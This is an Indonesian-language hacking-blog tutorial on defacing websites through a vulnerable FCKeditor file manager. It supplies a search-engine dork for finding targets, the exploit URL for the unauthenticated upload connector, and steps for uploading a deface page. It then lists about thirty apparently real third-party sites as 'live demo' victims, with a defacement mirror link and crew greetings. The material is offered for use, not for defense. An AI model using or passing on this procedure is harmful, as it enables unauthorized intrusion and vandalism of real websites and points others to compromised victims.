Tutorial Deface Methode FCKeditor Vuln terbaru

Tutorial Deface Metode FckEditor Vuln 2k17

DapssquaD kali ini akan share tutorial deface metode FCK Editor Vuln terbaru.Terbaru?..au dah baru apa kagak....Tapi eksekusi file uploadannya emang beda sih sama yang dulu.OK dah langsung saja tutorialnya

=================================================================

Dork:

inurl:advert_detail.php?id=

exploit:

/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

=================================================================

1.Dorking mangsa dulu seperti biasa dork diatas ea gan.

2.Nah kalo udah dorking  exploit pake yang diatas juga gan jadi gini:

www.site.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

3.Kalo vuln untuk fck tampilannya bakal gini gan.Nah liat yang ditandai panah gan kan ada tempat upload file tuh klik gan.Jangan ke-kencengan nanti sakit. :(

2.Terus cari file yang ingin kalian upload,alias script deface kalian  kalo udah klik open atau apalah..

3.nah kalo udah klik upload gan...

4.Nah kalo udah keupload.Sekarang liat hasilnya gan.Sebelumnya pastian terlebih dahulu file kalian sudah terupaload .

Cara eksekusi file atau uploadan script deface kalian:www.site.com/files/namafilekalian.html

live demo?....Nih:

http://piramitemlak.net/files/yka37.html

http://www.muratlirotaemlak.com/files/yka37.html

http://emlak.ukyatirim.com/files/yka37.html

http://www.otelcimden.com/files/yka37.html

http://www.tekarsaofisi.com/files/yka37.html

http://www.tugsey.com.tr/files/yka37.html

http://www.xn--baharinaat-k9b.com/files/yka37.html

http://karakocanemlak.com/files/yka37.html

http://www.fethiye-apartoteller.com/files/yka37.html

http://www.interacsproperties.com/files/yka37.html

http://www.yurtotomotiv.com.tr/files/yka37.html

http://www.helvaciemlak.com/files/yka37.html

http://www.antalyaarsasahibinden.com/files/yka37.html

http://kurmaygayrimenkul.com/files/yka37.html

http://uguremlax.com/files/yka37.html

http://www.ilkegayrimenkul.com.tr/files/yka37.html

http://www.bozyaziemlak.com/files/yka37.html

http://www.torcanlarinsaat.com.tr/files/yka37.html

http://www.rubiconadvice.ro/files/yka37.html

http://www.madenliemlak.com/files/yka37.html

http://www.villabereket.com/files/yka37.html

http://www.ensaremlak.com.tr/files/yka37.html

http://eskaan.com/files/yka37.html

http://www.musa24.de/files/yka37.html

http://www.nmgayrimenkul.com/files/yka37.html

http://www.onzeinsaat.com/files/yka37.html

http://kralgayrimenkul.com/files/yka37.html

http://manisacimenemlak.com.tr/files/yka37.html

http://piramitemlak.net/files/yka37.html

Miror?...https://zonedeface.org/attacker/Mr.yka37-1.html

Gretz: Mr.Yka37 ~ Astra ~ [M023L404] ~ Mr.Capital ~ xXx ~ GTX00 ~ DDIQ | Gilang DX ~ PO5TMAN ~ Mind Jaster Probe ~ S3rver_3r0r ~ PerlX ~ C_21 ~ Mr.Eror404 ~ ./SpecimenT ~  xNo0bx ~ B4BYB05 ~ Mr.R3XUS'2 [01010010] ~ SH460WM4N ~ Mr.Cakil ~   121FK1 ~ Jelly407 ~ Mr.Kdb17 ~

sumber: thankls to : Defasquad ~ cowokskerenteams